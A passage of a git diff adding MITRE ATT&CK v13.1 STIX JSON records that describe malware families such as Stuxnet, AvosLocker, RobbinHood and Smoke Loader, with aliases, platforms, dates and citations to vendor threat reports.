/dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--088f1d6e-0783-47c6-9923-9c79b2af43d4.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--b73954e9-1892-4e9c-aefa-a084ce779c9c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T13:50:55.168Z", + "name": "Stuxnet", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) ", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "Stuxnet", + "W32.Stuxnet" + ], + "type": "malware", + "id": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "created": "2020-12-14T17:34:58.457Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0603", + "external_id": "S0603" + }, + { + "source_name": "W32.Stuxnet", + "description": "(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) " + }, + { + "source_name": "CISA ICS Advisory ICSA-10-272-01", + "description": "CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.", + "url": "https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01" + }, + { + "source_name": "ESET Stuxnet Under the Microscope", + "description": "Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.", + "url": "https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "Langer Stuxnet", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--08d20cd2-f084-45ee-8558-fa6ef5a18519.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--08d20cd2-f084-45ee-8558-fa6ef5a18519.json new file mode 100644 index 0000000000000000000000000000000000000000..d651591b6f041605e1a2c91b6f901bed9147a11d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--08d20cd2-f084-45ee-8558-fa6ef5a18519.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--d20115c9-4eb5-4f08-8d12-1ded698b509a", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Downdelph", + "Delphacy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--08d20cd2-f084-45ee-8558-fa6ef5a18519", + "type": "malware", + "created": "2017-05-31T21:33:16.790Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0134", + "external_id": "S0134" + }, + { + "source_name": "ESET Sednit Part 3", + "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + } + ], + "modified": "2020-03-30T15:32:15.795Z", + "name": "Downdelph", + "description": "[Downdelph](https://attack.mitre.org/software/S0134) is a first-stage downloader written in Delphi that has been used by [APT28](https://attack.mitre.org/groups/G0007) in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0945a1a5-a79a-47c8-9079-10c16cdfcb5d.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0945a1a5-a79a-47c8-9079-10c16cdfcb5d.json new file mode 100644 index 0000000000000000000000000000000000000000..8baaeef2e92711e3fe9ad60c1aacbfefde0df166 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0945a1a5-a79a-47c8-9079-10c16cdfcb5d.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--40d8d096-5f13-4b81-8825-487c92208802", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-15T17:03:59.324Z", + "name": "AvosLocker", + "description": "[AvosLocker](https://attack.mitre.org/software/S1053) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, [AvosLocker](https://attack.mitre.org/software/S1053) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Joint CSA AvosLocker Mar 2022)", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Flavio Costa, Cisco" + ], + "x_mitre_aliases": [ + "AvosLocker" + ], + "type": "malware", + "id": "malware--0945a1a5-a79a-47c8-9079-10c16cdfcb5d", + "created": "2023-01-11T21:17:36.149Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1053", + "external_id": "S1053" + }, + { + "source_name": "Joint CSA AvosLocker Mar 2022", + "description": "FBI, FinCEN, Treasury. (2022, March 17). Indicators of Compromise Associated with AvosLocker Ransomware. Retrieved January 11, 2023.", + "url": "https://www.ic3.gov/Media/News/2022/220318.pdf" + }, + { + "source_name": "Malwarebytes AvosLocker Jul 2021", + "description": "Hasherezade. (2021, July 23). AvosLocker enters the ransomware scene, asks for partners. Retrieved January 11, 2023.", + "url": "https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners" + }, + { + "source_name": "Trend Micro AvosLocker Apr 2022", + "description": "Trend Micro Research. (2022, April 4). Ransomware Spotlight AvosLocker. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0998045d-f96e-4284-95ce-3c8219707486.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0998045d-f96e-4284-95ce-3c8219707486.json new file mode 100644 index 0000000000000000000000000000000000000000..eb1d8d314b7c3240565e79afdefbd478eece1b64 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0998045d-f96e-4284-95ce-3c8219707486.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--f732578b-ed32-4f07-83e7-5e5dcbad95e7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "SEASHARPEE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0998045d-f96e-4284-95ce-3c8219707486", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0185", + "external_id": "S0185" + }, + { + "source_name": "SEASHARPEE", + "description": "(Citation: FireEye APT34 Webinar Dec 2017)" + }, + { + "url": "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "description": "Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.", + "source_name": "FireEye APT34 Webinar Dec 2017" + } + ], + "modified": "2021-04-23T20:29:59.216Z", + "name": "SEASHARPEE", + "description": "[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: FireEye APT34 Webinar Dec 2017)", + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--099ecff2-41b8-436d-843c-038a9aa9aa69.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--099ecff2-41b8-436d-843c-038a9aa9aa69.json new file mode 100644 index 0000000000000000000000000000000000000000..a7e16c8d33c49f78db3fafa3902688cc4c3d1f68 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--099ecff2-41b8-436d-843c-038a9aa9aa69.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a2c60b79-ef3d-4e33-afc4-3be7f7cd5571", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Get2" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69", + "type": "malware", + "created": "2020-05-29T20:32:42.686Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0460", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0460" + }, + { + "source_name": "Proofpoint TA505 October 2019", + "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader", + "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020." + } + ], + "modified": "2020-06-16T16:48:16.541Z", + "name": "Get2", + "description": "[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBbot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46.json new file mode 100644 index 0000000000000000000000000000000000000000..eb7f68d9f8279d90eeccd1c8f2afc504aa7de15f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--a37f5c27-572e-4861-b9d0-15fb816cc4c1", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "POWRUNER" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0184", + "external_id": "S0184" + }, + { + "source_name": "POWRUNER", + "description": "(Citation: FireEye APT34 Dec 2017)" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.", + "source_name": "FireEye APT34 Dec 2017" + } + ], + "modified": "2020-07-06T16:11:56.562Z", + "name": "POWRUNER", + "description": "[POWRUNER](https://attack.mitre.org/software/S0184) is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0a607c53-df52-45da-a75d-0e53df4dad5f.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0a607c53-df52-45da-a75d-0e53df4dad5f.json new file mode 100644 index 0000000000000000000000000000000000000000..dfa22d375144f086ffdb2ebbf642236076fed6bc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0a607c53-df52-45da-a75d-0e53df4dad5f.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--886df174-22c0-4c94-b2c1-d202e4a19e8a", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "RobbinHood" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0a607c53-df52-45da-a75d-0e53df4dad5f", + "type": "malware", + "created": "2019-07-29T14:27:18.204Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0400", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0400" + }, + { + "description": "Lee, S. (2019, May 17). CB TAU Threat Intelligence Notification: RobbinHood Ransomware Stops 181 Windows Services Before Encryption. Retrieved July 29, 2019.", + "url": "https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomware-stops-181-windows-services-before-encryption/", + "source_name": "CarbonBlack RobbinHood May 2019" + }, + { + "description": "Duncan, I., Campbell, C. (2019, May 7). Baltimore city government computer network hit by ransomware attack. Retrieved July 29, 2019.", + "url": "https://www.baltimoresun.com/politics/bs-md-ci-it-outage-20190507-story.html", + "source_name": "BaltimoreSun RobbinHood May 2019" + } + ], + "modified": "2020-03-30T18:05:52.348Z", + "name": "RobbinHood", + "description": "[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.(Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3.json new file mode 100644 index 0000000000000000000000000000000000000000..def389485b28ba9562cd46582d6cbe00e867a438 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--fdae174c-e682-4ef8-9928-3b580b3d06fc", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0177", + "external_id": "S0177" + }, + { + "source_name": "MalwareTech Power Loader Aug 2013", + "description": "MalwareTech. (2013, August 13). PowerLoader Injection \u2013 Something truly amazing. Retrieved December 16, 2017.", + "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html" + }, + { + "source_name": "WeLiveSecurity Gapz and Redyms Mar 2013", + "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", + "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Power Loader", + "description": "[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a.json new file mode 100644 index 0000000000000000000000000000000000000000..96b0f5d4fcd2dee4760aea08e44b7627e8039a62 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--55a8234a-4d5d-4c6a-88d5-c3e4991793a8", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "TDTESS" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0164", + "external_id": "S0164" + }, + { + "source_name": "TDTESS", + "description": "(Citation: ClearSky Wilted Tulip July 2017)" + }, + { + "url": "http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf", + "description": "ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.", + "source_name": "ClearSky Wilted Tulip July 2017" + } + ], + "modified": "2020-03-30T18:18:53.335Z", + "name": "TDTESS", + "description": "[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit .NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0ba9281c-93fa-4b29-8e9e-7ef918c7b13a.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0ba9281c-93fa-4b29-8e9e-7ef918c7b13a.json new file mode 100644 index 0000000000000000000000000000000000000000..aefea8bd390f19934e295cce6a26fe99314a6d78 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0ba9281c-93fa-4b29-8e9e-7ef918c7b13a.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--244ce17c-50aa-4337-904f-ce75c7a9b3eb", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "SharpStage" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0ba9281c-93fa-4b29-8e9e-7ef918c7b13a", + "type": "malware", + "created": "2020-12-22T17:02:52.954Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0546", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0546" + }, + { + "source_name": "SharpStage", + "description": "(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)" + }, + { + "source_name": "Cybereason Molerats Dec 2020", + "url": "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", + "description": "Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020." + }, + { + "source_name": "BleepingComputer Molerats Dec 2020", + "url": "https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/", + "description": "Ilascu, I. (2020, December 14). Hacking group\u2019s new malware abuses Google and Facebook services. Retrieved December 28, 2020." + } + ], + "modified": "2021-08-18T23:48:44.783Z", + "name": "SharpStage", + "description": "[SharpStage](https://attack.mitre.org/software/S0546) is a .NET malware with backdoor capabilities.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0c824410-58ff-49b2-9cf2-1c96b182bdf0.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0c824410-58ff-49b2-9cf2-1c96b182bdf0.json new file mode 100644 index 0000000000000000000000000000000000000000..6698859c745f6ca1ea35020b872ff476a4272b67 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0c824410-58ff-49b2-9cf2-1c96b182bdf0.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--92f89e2c-4e87-493b-b396-6afdd3ab3d27", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Smoke Loader", + "Dofoil" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0c824410-58ff-49b2-9cf2-1c96b182bdf0", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0226", + "external_id": "S0226" + }, + { + "source_name": "Smoke Loader", + "description": "(Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)" + }, + { + "source_name": "Dofoil", + "description": "(Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)" + }, + { + "source_name": "Malwarebytes SmokeLoader 2016", + "description": "Hasherezade. (2016, September 12). Smoke Loader \u2013 downloader with a smokescreen still alive. Retrieved March 20, 2018.", + "url": "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/" + }, + { + "source_name": "Microsoft Dofoil 2018", + "description": "Windows Defender Research. (2018, March 7). Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign. Retrieved March 20, 2018.", + "url": "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/" + } + ], + "modified": "2020-03-28T21:43:37.366Z", + "name": "Smoke Loader", + "description": "[Smoke Loader](https://attack.mitre.org/software/S0226) is a malicious bot application that can be used to load other malware.\n[Smoke Loader](https://attack.mitre.org/software/S0226) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. (Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0ced8926-914e-4c78-bc93-356fb90dbd1f.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0ced8926-914e-4c78-bc93-356fb90dbd1f.json new file mode 100644 index 0000000000000000000000000000000000000000..9b4e3b4307769cb9a641a77307866d6f5a44c973 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0ced8926-914e-4c78-bc93-356fb90dbd1f.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--07b813d0-3b3b-4c0b-b69f-4a17bc91c3fc", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f", + "type": "malware", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0151", + "external_id": "S0151" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "HALFBAKED", + "description": "[HALFBAKED](https://attack.mitre.org/software/S0151) is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541.json new file mode 100644 index 0000000000000000000000000000000000000000..5ba9ab92b72e64db937e05470c6c3dae5d8bef0b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--50fabef7-15ce-49a8-8166-1813c5d9cd78", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "WindTail" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541", + "created": "2020-06-04T19:01:53.566Z", 